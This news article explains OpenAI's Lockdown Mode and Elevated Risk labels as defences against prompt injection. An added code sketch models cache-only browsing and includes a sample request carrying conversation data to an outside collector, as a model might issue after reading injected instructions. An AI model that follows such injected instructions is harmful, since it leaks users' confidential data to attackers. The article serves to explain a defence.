ChatGPT's new Lockdown Mode can stop prompt injection - here's how it works

Published: February 17, 2026 at 06:51 PM EST
Source: ZDNet


ZDNET’s key takeaways

  • Hackers use prompt injection to steal the private data you use in AI.
  • ChatGPT’s new Lockdown Mode aims to prevent these attacks.
  • Elevated Risk labels warn you of AI tools and content that could be risky.

Prompt injection attacks pose a serious threat to anyone who uses AI tools, especially professionals who rely on them at work. By exploiting a vulnerability that affects most AIs, a hacker can insert malicious code into a text prompt, which may then alter the results or even steal confidential data.

Now, OpenAI has introduced a feature called Lockdown Mode to better thwart these types of attacks.

Lockdown Mode

OpenAI’s Lockdown Mode enhances protection against prompt injections and other advanced threats. With this setting enabled, ChatGPT is limited in how it can interact with external systems and data, thereby restricting an attacker’s ability to exfiltrate sensitive files.

Lockdown Mode is an optional security setting—not required for most ChatGPT users. It is geared toward security‑minded users such as executives or security professionals at large organizations. The feature is available for ChatGPT Enterprise, ChatGPT Edu, ChatGPT for Healthcare, and ChatGPT for Teachers.

Lockdown Mode works by identifying which tools and capabilities in ChatGPT are most at risk and restricting access to any sensitive data in a conversation or from a connected app that could be exploited through prompt injection.

Disclosure: Ziff Davis, ZDNET’s parent company, filed an April 2025 lawsuit against OpenAI, alleging it infringed Ziff Davis copyrights in training and operating its AI systems.

For example, web browsing in Lockdown Mode limits access to cached content so that no live requests leave OpenAI’s network. Other features are disabled unless OpenAI can confirm that the data is safe, preventing attackers from stealing data through web browsing.
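
The cache-only browsing behavior described above can be sketched as a gateway that every model-issued web request must pass through. This is an added illustration, not OpenAI's implementation; `BrowseGateway`, the URLs, and the cache contents are hypothetical and constructed for the example.

```python
from dataclasses import dataclass, field


@dataclass
class BrowseGateway:
    """Hypothetical mediator for every web request a tool call would make."""
    lockdown: bool
    cache: dict                                   # url -> previously stored page text
    outbound: list = field(default_factory=list)  # requests that left the network

    def fetch(self, url: str) -> str:
        if url in self.cache:
            return self.cache[url]    # served locally, nothing leaves
        if self.lockdown:
            # Cache miss in lockdown: refuse rather than go to the network.
            raise PermissionError(f"blocked live request: {url}")
        self.outbound.append(url)     # stand-in for a real HTTP request
        return "<live response>"


def run_tool_calls(gateway, urls):
    """Pass each requested URL through the gateway; return (url, outcome) pairs."""
    results = []
    for url in urls:
        try:
            gateway.fetch(url)
            results.append((url, "served"))
        except PermissionError:
            results.append((url, "blocked"))
    return results


# Constructed sample data: one cached page, plus the two requests a model might
# issue after reading content that contains injected instructions. The second
# URL carries conversation data in its query string (placeholder value).
CACHE = {"https://docs.example/guide": "cached guide text"}
REQUESTS = [
    "https://docs.example/guide",
    "https://collector.example/log?d=CONFIDENTIAL_PLACEHOLDER",
]

if __name__ == "__main__":
    for mode in (False, True):
        gw = BrowseGateway(lockdown=mode, cache=dict(CACHE))
        label = "lockdown" if mode else "normal"
        print(label, run_tool_calls(gw, REQUESTS), "outbound:", gw.outbound)
```

With lockdown off, the second request reaches the network with the data attached; with lockdown on, the cached page is still served and the outbound list stays empty.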

ChatGPT business plans already offer enterprise‑level security protection, which administrators can control via Workspace settings. Lockdown Mode adds an extra layer of defense, and Workspace admins can also choose which apps and actions are governed by Lockdown Mode.

Elevated Risk labels

OpenAI will now display an Elevated Risk label when you access certain features that could be risky. These labels appear in ChatGPT, the ChatGPT Atlas browser, and the Codex coding assistant, prompting you to pause before working with a tool or content that could be exploited.

For instance, developers using Codex can grant the tool network access to search the web for assistance. When this access is enabled, the Elevated Risk label describes the potential risks, what may change, and when such access is warranted.

The Elevated Risk labels are a short‑term solution to inform users of potential dangers. OpenAI plans to add more security features across the board to address additional risks and eventually make such labels unnecessary.
